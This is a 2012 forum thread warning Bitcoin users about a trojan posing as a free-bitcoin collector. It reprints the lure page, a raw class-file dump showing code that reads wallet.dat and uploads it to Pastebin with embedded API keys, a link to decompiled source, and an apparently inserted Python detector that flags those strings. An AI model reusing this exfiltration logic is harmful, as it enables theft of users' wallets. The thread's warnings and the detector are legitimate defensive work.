Title: trojan warning "BITCOINCOLLECTR"
Post by: hamdi on May 24, 2012, 03:42:31 PM
WARNING! this tool tries to steal your wallet.dat!!! this guy ( https://bitcointalk.org/index.php?action=profile;u=57949 ) tries to lure people into using this tool via his signature right now!!
http://btccollectr.bt.ohost.de/
BitcoinCollectr beta
What is it?
BitcoinCollectr is a little project i'm working on at the moment. It makes use of websites that offer free bitcoins and automatically collects them for you.
Where can I get it?
Download here. Consider that it's still beta and probably buggy. Please report bugs to me.
Contact
yus0r@tormail.org
Donation
I know, it's not worth donating for, but if you insist: 1EZWAuXu3vfHTtBcLuEsht7q1d8Ab7dDPX
CA\FE\BA\BE\00\00\002v\00\00Main\00\00java/lang/Object\00<init>\00()V\00Code \00\00 \00\00\00LineNumberTable\00LocalVariableTable\00this\00LMain;\00main\00([Ljava/lang/String;)V\00\00FreeBitcoinService \00\00 \00\00Bitcoin Faucet \00\00\00\00\00name\00Ljava/lang/String;\00\00http://freebitcoins.appspot.com \00\00\00\00\00url?tz\E1G\AE{ \00\00!\00"\00#\00 btcAmount\00D\00%\00Daily Bitcoins\00'\00http://Daily Bitcoins?@bM\D2\F1\A9\FC\00+\00CoinAd\00-\00https://coinad.com/?h\93t\BCj~\FA\001\00Bitcoin Dispenser\003\00http://dispenser.bitbank.me/?PbM\D2\F1\A9\FC\007\00BitCrate\009\00http://http://www.bitcrate.net/?\94z\E1G\AE{\00=\00mycryptcoin.com\00?\00http://mycryptcoin.com/?`bM\D2\F1\A9\FC\00C\00BitcoinBetas\00E\00http://www.bitcoinbetas.com?\A9\99\99\99\99\99\9A\00I\00java/util/ArrayList \00H\00 \00L\00N\00M\00java/util/List\00O\00P\00add\00(Ljava/lang/Object;)Z?\ECz\E1G\AE{\00L\00T\00U\00V\00iterator\00()Ljava/util/Iterator;\00X\00Z\00Y\00java/util/Iterator\00[\00\\00next\00()Ljava/lang/Object;?\F3333333\00X\00`\00a\00b\00hasNext\00()Z\00d\00>.............................................................. \00\00f\00g\00h\00o\00(Ljava/lang/String;)V\00j\00>: BitcoinCollectr 0.8 beta 5/13/12 :\00l\00>: :\00n\00>: Author: Yus0r (yus0r@tormail.org) :\00p\00\00\00r\00: Looking for updates..\00t\00http://btccollectr.bt.ohost.de \00v\00x\00w\00Util\00y\00z\00getHTML\00&(Ljava/lang/String;)Ljava/lang/String; \00\00|\00}\00~\00getWalletFileName\00()Ljava/lang/String;\00\80\00java/io/File \00\00\82\00\00h \00\00\84\00\85\00\86\00getBytesFromFile\00(Ljava/io/File;)[B \00v\00\88\00\89\00\8A\00asHex\00([B)Ljava/lang/String; \00\00\8C\00\8D\00h\00sendPost\00\8F\00: no updates available.\00\91\00java/lang/StringBuilder\00\93\00 : Supporting \00\90\00\82\00L\00\96\00\97\00\98\00size\00()I \00\90\00\9A\00\9B\00\9C\00append\00(I)Ljava/lang/StringBuilder;\00\9E\00! free bitcoin collector websites. 
\00\90\00\A0\00\9B\00\A1\00-(Ljava/lang/String;)Ljava/lang/StringBuilder; \00\90\00\A3\00\A4\00~\00toString\00\A6\00: Max. possible profit @\00\00\00\00\00\00\00 \00\90\00\AA\00\9B\00\AB\00(D)Ljava/lang/StringBuilder;\00\AD\00 BTC.\00\AF\00*: Enter receiving address and press ENTER:\00\B1\00java/io/BufferedReader\00\B3\00java/io/InputStreamReader \00\B5\00\B7\00\B6\00java/lang/System\00\B8\00\B9\00in\00Ljava/io/InputStream; \00\B2\00\BB\00\00\BC\00(Ljava/io/InputStream;)V \00\B0\00\BE\00\00\BF\00(Ljava/io/Reader;)V \00\B0\00\C1\00\C2\00~\00readLine\00\C4\00: Starting..\00\C6\00: Processing <\00\C8\00>....\00\CA\00java/net/ConnectException \00\C9\00\82 \00\CD\00\CF\00\CE\00java/lang/Exception\00\D0\00\00printStackTrace \00\D2\00\CF\00\D3\00java/io/IOException\00args\00[Ljava/lang/String;\00f1\00LFreeBitcoinService;\00f2\00f3\00f4\00f5\00f6\00f7\00services\00Ljava/util/List;\00max\00s\00filename\00bytes\00[B\00hex\00Ljava/io/BufferedReader;\00address\00e\00Ljava/lang/Exception;\00e1\00Ljava/io/IOException;\00LocalVariableTypeTable\00&Ljava/util/List<LFreeBitcoinService;>;\00 StackMapTable\00\D5\00\F1\00java/lang/String\00 Exceptions\00\F4\00java/net/UnknownHostException\00\F6\00api_dev_key\00\F8\00UTF-8 \00\FA\00\FC\00\FB\00java/net/URLEncoder\00\FD\00\FE\00encode\008(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String; \00\F0\00\00valueOf\00&(Ljava/lang/Object;)Ljava/lang/String;\00=\00 562298eb26ccc3719f7fa178f8b7fef4\00& \00 api_option\00paste\00api_user_key\00api_paste_code\00"baedd069b2f6e0948a80c7a8f3daf052: \00java/net/URL\00$http://pastebin.com/api/api_post.php \00\82 \00openConnection\00()Ljava/net/URLConnection; \00java/net/URLConnection !\00setDoOutput\00(Z)V#\00java/io/OutputStreamWriter %&'\00getOutputStream\00()Ljava/io/OutputStream; ")\00*\00(Ljava/io/OutputStream;)V ",-\00h\00write "/0\00\00flush 234\00getInputStream\00()Ljava/io/InputStream; "67\00\00close 
\00\B06\00content\00data\00Ljava/net/URL;\00conn\00Ljava/net/URLConnection;\00wr\00Ljava/io/OutputStreamWriter;\00rd\00lineC\00os.name \00\B5EF\00z\00getPropertyH\00Linux \00\F0JKL\00contains\00(Ljava/lang/CharSequence;)ZN\00 user.homeP\00/.bitcoin/wallet.datR\00APPDATA \00\B5TU\00z\00getenvW\00\Bitcoin\wallet.dat\00osnameZ\00java/io/FileInputStream Y\\00]\00(Ljava/io/File;)V \00_`a\00length\00()J Ycde\00read\00([B)I Y6\00file\00Ljava/io/File;\00fileInputStream\00Ljava/io/FileInputStream; \00\B5lmn\00out\00Ljava/io/PrintStream; prq\00java/io/PrintStreams\00h\00println\00 SourceFile\00 Main.java
Title: Re: trojan warning "BITCOINCOLLECTR"
Post by: rjk on May 24, 2012, 03:47:25 PM
Please break your links so that they do not get indexed and flagged.
Title: Re: trojan warning "BITCOINCOLLECTR"
Post by: giszmo on May 24, 2012, 11:40:11 PM
not too eager to investigate the claims but if it's true, why is this thread so quiet?
Title: Re: trojan warning "BITCOINCOLLECTR"
Post by: vuce on May 25, 2012, 06:10:24 AM
Even if true I don't see this as such a problem anymore, pretty much everyone should have his wallet encrypted at this time...
Title: Re: trojan warning "BITCOINCOLLECTR"
Post by: drakahn on May 25, 2012, 06:18:10 AM
there is another one too that people have fallen for "neheminer" or something, claims to be the fastest mining program but steals your wallet (and possibly changes btc addresses sent to clipboard, that may be a different trojan altogether though)
is there a way to monitor wallet.dat and stop any program from accessing it without some sort of user interaction?
Title: Re: trojan warning "BITCOINCOLLECTR"
Post by: vuce on May 25, 2012, 06:21:13 AM
is there a way to monitor wallet.dat and stop any program from accessing it without some sort of user interaction?
acl (http://en.wikipedia.org/wiki/Access_control_list)
Title: Re: trojan warning "BITCOINCOLLECTR"
Post by: drakahn on May 25, 2012, 06:24:02 AM
Title: Re: trojan warning "BITCOINCOLLECTR"
Post by: dizzy1 on May 31, 2012, 01:14:43 AM
This is a trojan. It reads the wallet.dat from the file level and pastes it to pastebin.com, so if your wallet is encrypted you should be fine. Linked below is the decompiled source code.
http://freeter.me:81/BitcoinCollectr0.8beta.src.zip
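A defender-side triage check for the behaviour described in this post, as an added example that is not part of the thread or of the decompiled source: it parses a Java class file's constant pool and flags the combination of a wallet.dat path, a file-read API and Pastebin upload strings, all of which appear in the dump in the first post. The function names, the rule that every marker group must match, and the sample inputs are assumptions constructed for illustration.

```python
import struct
# Bytes following the tag for each fixed-width constant-pool entry type.
_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
          12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

# Marker groups, all taken from strings visible in the dump posted in this thread.
GROUPS = {
    "wallet_path": ("wallet.dat",),
    "file_read": ("java/io/FileInputStream",),
    "upload": ("pastebin.com/api/api_post.php", "api_paste_code"),
}

def class_strings(data: bytes) -> list:
    """Return every CONSTANT_Utf8 entry in a Java class file's constant pool."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a Java class file")
    (count,) = struct.unpack_from(">H", data, 8)
    pos, index, out = 10, 1, []
    while index < count:
        tag, pos = data[pos], pos + 1
        if tag == 1:  # Utf8: u2 length, then that many bytes
            (n,) = struct.unpack_from(">H", data, pos)
            out.append(data[pos + 2:pos + 2 + n].decode("utf-8", "replace"))
            pos += 2 + n
        elif tag in _FIXED:
            pos += _FIXED[tag]
        else:
            raise ValueError(f"unknown constant-pool tag {tag}")
        index += 2 if tag in (5, 6) else 1  # long/double take two slots
    return out

def triage(data: bytes):
    """Return (suspicious, hits); suspicious only if every group matched."""
    strings = class_strings(data)
    hits = {g: [s for s in strings if any(m in s for m in marks)]
            for g, marks in GROUPS.items()}
    return all(hits.values()), hits

def build_sample(strings):
    """Constructed test input: header, one double, then the given Utf8 entries."""
    pool = b"\x06" + struct.pack(">d", 0.05)
    for s in strings:
        raw = s.encode()
        pool += b"\x01" + struct.pack(">H", len(raw)) + raw
    return b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 50, len(strings) + 3) + pool

SUSPECT = build_sample(["/.bitcoin/wallet.dat", "java/io/FileInputStream",
                        "http://pastebin.com/api/api_post.php", "api_paste_code"])
BENIGN = build_sample(["java/io/FileInputStream", "settings.properties"])
```

To check a real download, unpack the jar and pass each `.class` file's bytes to `triage()`; a match is a reason to read the decompiled code, not a verdict on its own.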
Title: Re: trojan warning "BITCOINCOLLECTR"
Post by: rjk on May 31, 2012, 01:23:27 AM
This is a trojan. It reads the wallet.dat from the file level and pastes it to pastebin.com, so if your wallet is encrypted you should be fine. Linked below is the decompiled source code.
http://freeter.me:81/BitcoinCollectr0.8beta.src.zip
Maybe if you send the pastebin-related source snippet to pastebin, maybe they can help identify the user based on the included dev and user API keys?
Title: Re: trojan warning "BITCOINCOLLECTR"
Post by: hamdi on June 07, 2012, 12:50:07 AM
the virus is pretty cool though